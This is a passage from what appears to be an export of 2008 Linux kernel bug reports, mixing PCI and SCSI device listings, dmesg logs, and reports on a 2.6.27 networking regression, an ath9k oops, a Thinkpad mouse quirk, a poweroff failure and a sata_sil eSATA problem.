PME(D0-,D1+,D2+,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: 3c59x Kernel modules: 3c59x 00:11.0 Multimedia audio controller: Ensoniq ES1371 [AudioPCI-97] (rev 06) Subsystem: Ensoniq ES1371 [AudioPCI-97] Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=slow &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (3000ns min, 32000ns max) Interrupt: pin A routed to IRQ 11 Region 0: I/O ports at d000 [size=64] Capabilities: [dc] Power Management version 1 Flags: PMEClk- DSI+ D1- D2+ AuxCurrent=0mA PME(D0+,D1-,D2+,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: ENS1371 Kernel modules: snd-ens1371 00:13.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 50) Subsystem: First International Computer, Inc. Device 1234 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 11 Region 4: I/O ports at c800 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:13.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 50) Subsystem: First International Computer, Inc. Device 1234 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 32 bytes Interrupt: pin B routed to IRQ 11 Region 4: I/O ports at cc00 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:13.2 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 51) (prog-if 20) Subsystem: First International Computer, Inc. Device 1234 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin C routed to IRQ 10 Region 0: Memory at cfffca00 (32-bit, non-prefetchable) [size=256] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=375mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: ehci_hcd Kernel modules: ehci-hcd 01:00.0 VGA compatible controller: nVidia Corporation NV34 [GeForce FX 5200] (rev a1) Subsystem: ASUSTeK Computer Inc. Device 80df Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (1250ns min, 250ns max) Interrupt: pin A routed to IRQ 11 Region 0: Memory at ce000000 (32-bit, non-prefetchable) [size=16M] Region 1: Memory at c0000000 (32-bit, prefetchable) [size=128M] Expansion ROM at cfee0000 [disabled] [size=128K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [44] AGP version 3.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; Kernel modules: nvidiafb cat /proc/scsi/scsi Attached devices: Host: scsi0 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: SAMSUNG SV0842D Rev: MB10 Type: Direct-Access ANSI SCSI revision: 05 Host: scsi0 Channel: 00 Id: 01 Lun: 00 Vendor: ATA Model: Maxtor 6Y080L0 Rev: YAR4 Type: Direct-Access ANSI SCSI revision: 05 Host: scsi1 Channel: 00 Id: 00 Lun: 00 Vendor: HL-DT-ST Model: DVD-RAM GSA-H55N Rev: 1.02 Type: CD-ROM ANSI SCSI revision: 05 Host: scsi1 Channel: 00 Id: 01 Lun: 00 Vendor: HL-DT-ST Model: DVD-ROM GDR8163B Rev: 0L23 Type: CD-ROM ANSI SCSI revision: 05 a couple of weeks ago i updated ubuntu intrepid and kernel 2.6.27 was installed. once i rebooted i noticed i could "ping" and "host" but could not navigate internet via firefox, w3m, etc or update. i've thought that an ubuntu bug was the reason of it, so i filed a bug with ubuntu, but no solution being found i've decided to download 2.6.26 source from kernel.org, patch it with 2.6.27-rc8 prepatch, run make oldconfig and compile my own kernel. in make oldconfig i tried both accepting the defaults which were proposed and saying "no" , in both cases after having conmpiled the kernel i still experienced the same problems as with ubuntu intrepid 2.6.27 kernel. since i have debian lenny on another partition of the hd in the same machine i've tried there as well following the same procedure as in the case of ubuntu intrepid, but i've got the same results, i can ping and host but cannot navigate internet. my home lan is made up of a modem, packets are sent to my home server which routes them by means of iptables to the other three home pc's, the system is wired, no wi-fi involved. i experienced the above problems in the two pc's where i tried the above attempts. if i launch iptraf in the home server i can see that udp requests to the dns servers from the machine where intrepid is installed receive answers (this is the reason why "host" and "ping" work, i think) while in the case of tcp connections the syn packet goes through but it does not receive ack. needless to say that if i boot with 2.6.26 kernel everything works flawlessly. thanks aldo</t>
  </si>
  <si>
    <t>ath9k causes oops</t>
  </si>
  <si>
    <t>2.6.27-rc9</t>
  </si>
  <si>
    <t>2008-10-08 10:00 UTC</t>
  </si>
  <si>
    <t>Tim Gardner</t>
  </si>
  <si>
    <t>2008-10-13 08:07 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: unknown Distribution: Hardware Environment: Software Environment: Problem Description: https://lists.ath9k.org/pipermail/ath9k-devel/2008-October/000407.html Steps to reproduce: Fixed in wireless-testing commit 7768a47e04750e128ae97bbc759a2f5bc60ba668</t>
  </si>
  <si>
    <t>Thinkpad R31 needs nomux=1, patch incl</t>
  </si>
  <si>
    <t>2008-10-08 12:05 UTC</t>
  </si>
  <si>
    <t>Colin Macdonald</t>
  </si>
  <si>
    <t>2008-10-26 13:01 UTC</t>
  </si>
  <si>
    <t>For years, I've used the i8042.nomux=1 command line argument with this machine. Ubuntu has a patch that appears in some of their kernels (but not all). AFAICT, they never submitted it upstream, so I will. Here's the Ubuntu bug report: https://bugs.launchpad.net/ubuntu/+source/linux-source-2.6.15/+bug/21558 I'll attach patch and dmi data...</t>
  </si>
  <si>
    <t>2.6.26 regression - no poweroff - ABIT I-45CV mainboard</t>
  </si>
  <si>
    <t>2.6.26.6</t>
  </si>
  <si>
    <t>2008-10-09 04:25 UTC</t>
  </si>
  <si>
    <t>Sven Joachim</t>
  </si>
  <si>
    <t>2012-05-22 14:49 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26.5 Earliest failing kernel version: 2.6.26.6 Distribution: Debian sid Hardware Environment: ABIT I-45CV mainboard, Intel Core 2 Duo E8200, 4 GB RAM Software Environment: util-linux 2.13.1.1, sysv-rc 2.86 Problem Description: Machine does not power off on halt. All shutdown scripts are executed, the last message is that ACPI state S5 is entered. Steps to reproduce: Enter Runlevel 0.</t>
  </si>
  <si>
    <t>sata_sil fails to initialize the drive</t>
  </si>
  <si>
    <t>2008-10-09 17:28 UTC</t>
  </si>
  <si>
    <t>Ben Kibbey</t>
  </si>
  <si>
    <t>2008-10-10 18:12 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Debian testing (lenny) Hardware Environment: i386 Software Environment: Problem Description: I am using an external eSATA HDD enclosure connected to a PCMCIA sata_sil SATA host (Silicon Image 3512 chipset). Heres the error after plugging in the card: sata_sil 0000:03:00.0: cache line size not set. Driver may not function sata_sil 0000:03:00.0: Applying R_ERR on DMA activate FIS errata fix PCI: Setting latency timer of device 0000:03:00.0 to 64 scsi8 : sata_sil scsi9 : sata_sil ata1: SATA max UDMA/100 mmio m512@0xe8480000 tf 0xe8480080 irq 10 ata2: SATA max UDMA/100 mmio m512@0xe8480000 tf 0xe84800c0 irq 10 ata1: SATA link down (SStatus 0 SControl 310) ata2: SATA link down (SStatus 0 SControl 310) ata1: exception Emask 0x10 SAct 0x0 SErr 0x50000 action 0xe frozen ata1: SError: { PHYRdyChg CommWake } ata1: hard resetting link ata1: link is slow to respond, please be patient (ready=-19) ata1: COMRESET failed (errno=-ata1: link is slow to respond, please be patient (ready=-19) ata1: COMRESET failed (errno=-16) ata1: hard resetting link ata1: COMRESET failed (errno=-16) ata1: reset failed, giving up ata1: EH complete 16) ata1: hard resetting link ata1: link is slow to respond, please be patient (ready=-19) ata1: COMRESET failed (errno=-16) ata1: hard resetting link I did notice that after the yenta_socket (PCMCIA driver) module was installed, this error appears: cs: pcmcia_socket0: unable to apply power. Then the sata_sil module does it's thing from above. Here's my dmesg (truncated some) and lspci and lsmod output: bytes) Detected 1595.329 MHz processor. Console: colour VGA+ 80x25 console [tty0] enabled Dentry cache hash table entries: 65536 (order: 6, 262144 bytes) Inode-cache hash table entries: 32768 (order: 5, 131072 bytes) Memory: 513364k/523776k available (1553k kernel code, 9788k reserved, 587k data, 200k init, 0k highmem) virtual kernel memory layout: fixmap : 0xfffb5000 - 0xfffff000 ( 296 kB) vmalloc : 0xe0800000 - 0xfffb3000 ( 503 MB) lowmem : 0xc0000000 - 0xdff80000 ( 511 MB) .init : 0xc031a000 - 0xc034c000 ( 200 kB) .data : 0xc0284594 - 0xc03172f8 ( 587 kB) .text : 0xc0100000 - 0xc0284594 (1553 kB) Checking if this processor honours the WP bit even in supervisor mode...Ok. CPA: page pool initialized 1 of 1 pages preallocated Calibrating delay using timer specific routine.. 3192.48 BogoMIPS (lpj=1596241) Security Framework initialized Capability LSM initialized Mount-cache hash table entries: 512 CPU: Trace cache: 12K uops, L1 D cache: 8K CPU: L2 cache: 512K Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. CPU0: Intel P4/Xeon Extended MCE MSRs (12) available CPU0: Thermal monitoring enabled CPU: Intel(R) Pentium(R) 4 Mobile CPU 1.60GHz stepping 04 Checking 'hlt' instruction... OK. Freeing SMP alternatives: 0k freed ACPI: Core revision 20080321 ACPI: setting ELCR to 0200 (from 0420) net_namespace: 480 bytes NET: Registered protocol family 16 EISA bus registered ACPI: bus type pci registered PCI: PCI BIOS revision 2.10 entry at 0xfd999, last bus=2 PCI: Using configuration type 1 for base access Setting up standard PCI resources ACPI: EC: Look up EC in DSDT ACPI: Interpreter enabled ACPI: (supports S0 S3 S5) ACPI: Using PIC for interrupt routing ACPI: Device [BAY2] status [00000008]: functional but not present; setting present ACPI: EC: GPE = 0x1d, I/O: command/status = 0x66, data = 0x62 ACPI: EC: driver started in poll mode ACPI: PCI Root Bridge [PCI0] (0000:00) pci 0000:00:1f.0: quirk: region 1000-107f claimed by ICH4 ACPI/GPIO/TCO pci 0000:00:1f.0: quirk: region 1180-11bf claimed by ICH4 GPIO PCI: Transparent bridge - 0000:00:1e.0 ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.AGP_._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.HUB_._PRT] ACPI: PCI Interrupt Link [LNKA] (IRQs *10) ACPI: PCI Interrupt Link [LNKB] (IRQs *10) ACPI: PCI Interrupt Link [LNKC] (IRQs *10) ACPI: PCI Interrupt Link [LNKD] (IRQs *5) ACPI: PCI Interrupt Link [LNKE] (IRQs *10) ACPI: PCI Interrupt Link [LNKF] (IRQs 10) *0, disabled. ACPI: PCI Interrupt Link [LNKG] (IRQs 10) *0, disabled. ACPI: PCI Interrupt Link [LNKH] (IRQs 10) *0, disabled. ACPI: Power Resource [PFN0] (off) ACPI: Power Resource [PFN1] (off) Linux Plug and Play Support v0.97 (c) Adam Belay pnp: PnP ACPI init ACPI: bus type pnp registered ACPI: EC: non-query interrupt received, switching to interrupt mode pnp: PnP ACPI: found 10 devices ACPI: ACPI bus type pnp unregistered PCI: Using ACPI for IRQ routing system 00:01: ioport range 0x1000-0x107f has been reserved system 00:01: ioport range 0x1180-0x11bf has been reserved system 00:01: ioport range 0x1c0-0x1cf has been reserved system 00:01: ioport range 0xfe00-0xfe00 has been reserved system 00:01: ioport range 0x4d0-0x4d1 has been reserved system 00:01: ioport range 0x600-0x60f has been reserved system 00:01: ioport range 0x610-0x61f has been reserved system 00:01: iomem range 0xff800000-0xffbfffff could not be reserved system 00:01: iomem range 0xfff00000-0xffffffff could not be reserved system 00:01: iomem range 0x0-0x9ffff could not be reserved system 00:01: iomem range 0xe0000-0xfffff could not be reserved system 00:01: iomem range 0x100000-0x1fffffff could not be reserved PCI: region 0000:02:02.0/9 too large: 0x0000000000000000-0x0000000003ffffff PCI: region 0000:02:02.1/9 too large: 0x0000000000000000-0x0000000003ffffff PCI: Bridge: 0000:00:01.0 IO window: 3000-3fff MEM window: 0xe8100000-0xe81fffff PREFETCH window: 0x00000000f0000000-0x00000000f7ffffff PCI: Bus 3, cardbus bridge: 0000:02:02.0 IO window: 0x00004000-0x000040ff IO window: 0x00004400-0x000044ff MEM window: 0x30000000-0x33ffffff PCI: Bus 7, cardbus bridge: 0000:02:02.1 IO window: 0x00004800-0x000048ff IO window: 0x00004c00-0x00004cff MEM window: 0x34000000-0x37ffffff PCI: Bridge: 0000:00:1e.0 IO window: 4000-5fff MEM window: 0xe8200000-0xe87fffff PREFETCH window: disabled. PCI: Setting latency timer of device 0000:00:1e.0 to 64 ACPI: PCI Interrupt Link [LNKC] enabled at IRQ 10 PCI: setting IRQ 10 as level-triggered ACPI: PCI Interrupt 0000:02:02.0[A] -&gt; Link [LNKC] -&gt; GSI 10 (level, low) -&gt; IRQ 10 ACPI: PCI Interrupt 0000:02:02.1[A] -&gt; Link [LNKC] -&gt; GSI 10 (level, low) -&gt; IRQ 10 NET: Registered protocol family 2 IP route cache hash table entries: 4096 (order: 2, 16384 bytes) TCP established hash table entries: 16384 (order: 5, 131072 bytes) TCP bind hash table entries: 16384 (order: 4, 65536 bytes) TCP: Hash tables configured (established 16384 bind 16384) TCP reno registered checking if image is initramfs... it is Freeing initrd memory: 2740k freed Simple Boot Flag at 0x36 set to 0x1 audit: initializing netlink socket (disabled) type=2000 audit(1223570991.689:1): initialized msgmni has been set to 1008 io scheduler noop registered io scheduler cfq registered (default) pci 0000:01:00.0: Boot video device pci 0000:02:08.0: Firmware left e100 interrupts enabled; disabling brd: module loaded Uniform Multi-Platform E-IDE driver ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx ide_generic: please use "probe_mask=0x3f" module parameter for probing all legacy ISA IDE ports Probing IDE interface ide0... Switched to high resolution mode on CPU 0 hda: IC25N020ATCS04-0, ATA DISK drive Probing IDE interface ide1... hdc: QSI CD-ROM SCR-242, ATAPI CD/DVD-ROM drive ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 ide1 at 0x170-0x177,0x376 on irq 15 hda: max request size: 128KiB hda: 39070080 sectors (20003 MB) w/1768KiB Cache, CHS=38760/16/63 hda: cache flushes not supported hda: hda1 hda2 PNP: PS/2 Controller [PNP0303:KBC,PNP0f13:MOU2] at 0x60,0x64 irq 1,12 i8042.c: Detected active multiplexing controller, rev 1.1. serio: i8042 KBD port at 0x60,0x64 irq 1 serio: i8042 AUX0 port at 0x60,0x64 irq 12 serio: i8042 AUX1 port at 0x60,0x64 irq 12 serio: i8042 AUX2 port at 0x60,0x64 irq 12 serio: i8042 AUX3 port at 0x60,0x64 irq 12 mice: PS/2 mouse device common for all mice cpuidle: using governor ladder cpuidle: using governor menu TCP cubic registered Using IPI Shortcut mode Freeing unused kernel memory: 200k freed device-mapper: ioctl: 4.13.0-ioctl (2007-10-18) initialised: dm-devel@redhat.com SCSI subsystem initialized Driver 'sd' needs updating - please use bus_type methods usbcore: registered new interface driver usbfs usbcore: registered new interface driver hub usbcore: registered new device driver usb ohci_hcd: 2006 August 04 USB 1.1 'Open' Host Controller (OHCI) Driver USB Universal Host Controller Interface driver v3.0 uhci_hcd 0000:00:1d.0: enabling device (0000 -&gt; 0001) ACPI: PCI Interrupt Link [LNKA] enabled at IRQ 10 ACPI: PCI Interrupt 0000:00:1d.0[A] -&gt; Link [LNKA] -&gt; GSI 10 (level, low) -&gt; IRQ 10 PCI: Setting latency timer of device 0000:00:1d.0 to 64 uhci_hcd 0000:00:1d.0: UHCI Host Controller uhci_hcd 0000:00:1d.0: new USB bus registered, assigned bus number 1 uhci_hcd 0000:00:1d.0: irq 10, io base 0x00001800 input: AT Translated Set 2 keyboard as /class/input/input0 usb usb1: configuration #1 chosen from 1 choice hub 1-0:1.0: USB hub found hub 1-0:1.0: 2 ports detected uhci_hcd 0000:00:1d.1: enabling device (0000 -&gt; 0001) ACPI: PCI Interrupt Link [LNKD] enabled at IRQ 5 PCI: setting IRQ 5 as level-triggered ACPI: PCI Interrupt 0000:00:1d.1[B] -&gt; Link [LNKD] -&gt; GSI 5 (level, low) -&gt; IRQ 5 PCI: Setting latency timer of device 0000:00:1d.1 to 64 uhci_hcd 0000:00:1d.1: UHCI Host Controller uhci_hcd 0000:00:1d.1: new USB bus registered, assigned bus number 2 uhci_hcd 0000:00:1d.1: irq 5, io base 0x00001820 usb usb2: configuration #1 chosen from 1 choice hub 2-0:1.0: USB hub found hub 2-0:1.0: 2 ports detected Initializing USB Mass Storage driver... usb 1-2: new full speed USB device using uhci_hcd and address 2 usb 1-2: configuration #1 chosen from 1 choice hub 1-2:1.0: USB hub found hub 1-2:1.0: 4 ports detected usb 1-2.2: new full speed USB device using uhci_hcd and address 3 usb 1-2.2: configuration #1 chosen from 1 choice hub 1-2.2:1.0: USB hub found hub 1-2.2:1.0: 3 ports detected usb 1-2.4: new full speed USB device using uhci_hcd and address 4 usb 1-2.4: configuration #1 chosen from 1 choice usb 1-2.2.1: new low speed USB device using uhci_hcd and address 5 usb 1-2.2.1: configuration #1 chosen from 1 choice usbcore: registered new interface driver usb-storage USB Mass Storage support registered. Yenta: CardBus bridge found at 0000:02:02.0 [107b:0400] PCI: Bus 3, cardbus bridge: 0000:02:02.0 IO window: 0x00004000-0x000040ff IO window: 0x00004400-0x000044ff PREFETCH window: 0xe8400000-0xe87fffff MEM window: 0x30000000-0x33ffffff Yenta: Enabling burst memory read transactions Yenta: Using CSCINT to route CSC interrupts to PCI Yenta: Routing CardBus interrupts to PCI Yenta TI: socket 0000:02:02.0, mfunc 0x011c1112, devctl 0x64 Yenta: ISA IRQ mask 0x08d8, PCI irq 10 Socket status: 30000006 Yenta: Raising subordinate bus# of parent bus (#02) from #02 to #06 pcmcia: parent PCI bridge I/O window: 0x4000 - 0x5fff cs: IO port probe 0x4000-0x5fff: clean. pcmcia: parent PCI bridge Memory window: 0xe8200000 - 0xe87fffff Yenta: CardBus bridge found at 0000:02:02.1 [107b:0400] PCI: Bus 7, cardbus bridge: 0000:02:02.1 IO window: 0x00004800-0x000048ff IO window: 0x00004c00-0x00004cff PREFETCH window: 0x38000000-0x383fffff MEM window: 0x34000000-0x37ffffff Yenta: Using CSCINT to route CSC interrupts to PCI Yenta: Routing CardBus interrupts to PCI Yenta TI: socket 0000:02:02.1, mfunc 0x011c1112, devctl 0x64 Yenta: ISA IRQ mask 0x08d8, PCI irq 10 Socket status: 30000006 Yenta: Raising subordinate bus# of parent bus (#02) from #06 to #0a pcmcia: parent PCI bridge I/O window: 0x4000 - 0x5fff cs: IO port probe 0x4000-0x5fff: clean. pcmcia: parent PCI bridge Memory window: 0xe8200000 - 0xe87fffff NET: Registered protocol family 1 ACPI: Transitioning device [FAN0] to D3 ACPI: PNP0C0B:00 is registered as cooling_device0 ACPI: Fan [FAN0] (off) ACPI: Transitioning device [FAN1] to D3 ACPI: PNP0C0B:01 is registered as cooling_device1 ACPI: Fan [FAN1] (off) ACPI: CPU0 (power states: C1[C1] C2[C2] C3[C3]) ACPI: ACPI0007:00 is registered as cooling_device2 ACPI: LNXTHERM:01 is registered as thermal_zone0 ACPI: Thermal Zone [THRM] (59 C) Marking TSC unstable due to: TSC halts in idle. kjournald starting. Commit interval 5 seconds EXT3-fs: mounted filesystem with ordered data mode. udevd version 125 started cs: IO port probe 0x100-0x3af: excluding 0x378-0x37f cs: IO port probe 0x3e0-0x4ff: excluding 0x3f8-0x3ff cs: IO port probe 0x820-0x8ff: clean. cs: IO port probe 0xc00-0xcf7: clean. cs: IO port probe 0xa00-0xaff: clean. cs: IO port probe 0x100-0x3af: excluding 0x378-0x37f cs: IO port probe 0x3e0-0x4ff: excluding 0x3f8-0x3ff cs: IO port probe 0x820-0x8ff: clean. cs: IO port probe 0xc00-0xcf7: clean. cs: IO port probe 0xa00-0xaff: clean. input: Power Button (FF) as /class/input/input1 ACPI: Power Button (FF) [PWRF] input: Lid Switch as /class/input/input2 ACPI: Lid Switch [LID] input: Sleep Button (CM) as /class/input/input3 ACPI: Sleep Button (CM) [SLPB] ACPI: AC Adapter [ACAD] (on-line) ACPI: Battery Slot [BAT1] (battery present) ACPI: Battery Slot [BAT2] (battery absent) ACPI: ACPI Dock Station Driver input: Video Bus as /class/input/input4 ACPI: Video Device [VGA] (multi-head: yes rom: no post: no) hdc: ATAPI 24X CD-ROM drive, 128kB Cache Uniform CD-ROM driver Revision: 3.20 ACPI: \_SB_.PCI0.IDE0.SECN.BAY1: found ejectable bay ACPI: \_SB_.PCI0.IDE0.SECN.BAY1: Adding notify handler ACPI: Bay [\_SB_.PCI0.IDE0.SECN.BAY1] Added ACPI: \_SB_.PCI0.IDE0.SECN.BAY2: found ejectable bay ACPI: \_SB_.PCI0.IDE0.SECN.BAY2: Adding notify handler ACPI: Bay [\_SB_.PCI0.IDE0.SECN.BAY2] Added Linux agpgart interface v0.103 agpgart: Detected an Intel 845G Chipset. agpgart: AGP aperture is 64M @ 0xec000000 pci_hotplug: PCI Hot Plug PCI Core version: 0.5 shpchp: Standard Hot Plug PCI Controller Driver version: 0.4 input: Dell Dell USB Keyboard Hub as /class/input/input5 input: USB HID v1.10 Keyboard [Dell Dell USB Keyboard Hub] on usb-0000:00:1d.0-2.2.1 input: Dell Dell USB Keyboard Hub as /class/input/input6 input: USB HID v1.10 Device [Dell Dell USB Keyboard Hub] on usb-0000:00:1d.0-2.2.1 usbcore: registered new interface driver usbhid usbhid: v2.6:USB HID core driver iTCO_wdt: Intel TCO WatchDog Timer Driver v1.03 (30-Apr-2008) iTCO_wdt: Found a ICH3-M TCO device (Version=1, TCOBASE=0x1060) iTCO_wdt: initialized. heartbeat=30 sec (nowayout=0) ICH3M: IDE controller (0x8086:0x248a rev 0x02) at PCI slot 0000:00:1f.1 PIIX_IDE 0000:00:1f.1: enabling device (0005 -&gt; 0007) ACPI: PCI Interrupt 0000:00:1f.1[A] -&gt; Link [LNKC] -&gt; GSI 10 (level, low) -&gt; IRQ 10 PCI: Unable to reserve I/O region #1:8@1f0 for device 0000:00:1f.1 ICH3M: can't reserve resources PIIX_IDE: probe of 0000:00:1f.1 failed with error -16 ACPI: PCI Interrupt Link [LNKB] enabled at IRQ 10 ACPI: PCI Interrupt 0000:00:1f.3[B] -&gt; Link [LNKB] -&gt; GSI 10 (level, low) -&gt; IRQ 10 libata version 3.00 loaded. ata_piix 0000:00:1f.1: version 2.12 PCI: Unable to reserve I/O region #1:8@1f0 for device 0000:00:1f.1 ata_piix 0000:00:1f.1: failed to request/iomap BARs for port 0 (errno=-16) PCI: Unable to reserve I/O region #3:8@170 for device 0000:00:1f.1 ata_piix 0000:00:1f.1: failed to request/iomap BARs for port 1 (errno=-16) ata_piix 0000:00:1f.1: no available native port Real Time Clock Driver v1.12ac Serial: 8250/16550 driver $Revision: 1.90 $ 4 ports, IRQ sharing disabled serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A ACPI: PCI Interrupt 0000:00:1f.6[B] -&gt; Link [LNKB] -&gt; GSI 10 (level, low) -&gt; IRQ 10 PCI: Setting latency timer of device 0000:00:1f.6 to 64 00:09: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A ACPI: PCI Interrupt 0000:02:03.0[A] -&gt; Link [LNKD] -&gt; GSI 5 (level, low) -&gt; IRQ 5 00:00.0 Host bridge: Intel Corporation 82845 845 [Brookdale] Chipset Host Bridge (rev 05) Subsystem: Gateway 2000 Device 0400 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort+ &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Latency: 0 Region 0: Memory at ec000000 (32-bit, prefetchable) [size=64M] Capabilities: [e4] Vendor Specific Information &lt;?&gt; Capabilities: [a0] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA+ AGP+ GART64- 64bit- FW- Rate=x4 Kernel driver in use: agpgart-intel Kernel modules: intel-agp 00:01.0 PCI bridge: Intel Corporation 82845 845 [Brookdale] Chipset AGP Bridge (rev 05) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 96 Bus: primary=00, secondary=01, subordinate=01, sec-latency=64 I/O behind bridge: 00003000-00003fff Memory behind bridge: e8100000-e81fffff Prefetchable memory behind bridge: f0000000-f7ffffff Secondary status: 66MHz+ FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Kernel modules: shpchp 00:1d.0 USB Controller: Intel Corporation 82801CA/CAM USB Controller #1 (rev 02) Subsystem: Gateway 2000 Device 0400 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 10 Region 4: I/O ports at 1800 [size=32] Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:1d.1 USB Controller: Intel Corporation 82801CA/CAM USB Controller #2 (rev 02) Subsystem: Gateway 2000 Device 0400 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin B routed to IRQ 5 Region 4: I/O ports at 1820 [size=32] Kernel driver in use: uhci_hcd Kernel modules: uhci-hcd 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev 42) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort+ &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Bus: primary=00, secondary=02, subordinate=0a, sec-latency=64 I/O behind bridge: 00004000-00005fff Memory behind bridge: e8200000-e87fffff Prefetchable memory behind bridge: fff00000-000fffff Secondary status: 66MHz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort+ &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Kernel modules: shpchp 00:1f.0 ISA bridge: Intel Corporation 82801CAM ISA Bridge (LPC) (rev 02) Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Kernel modules: 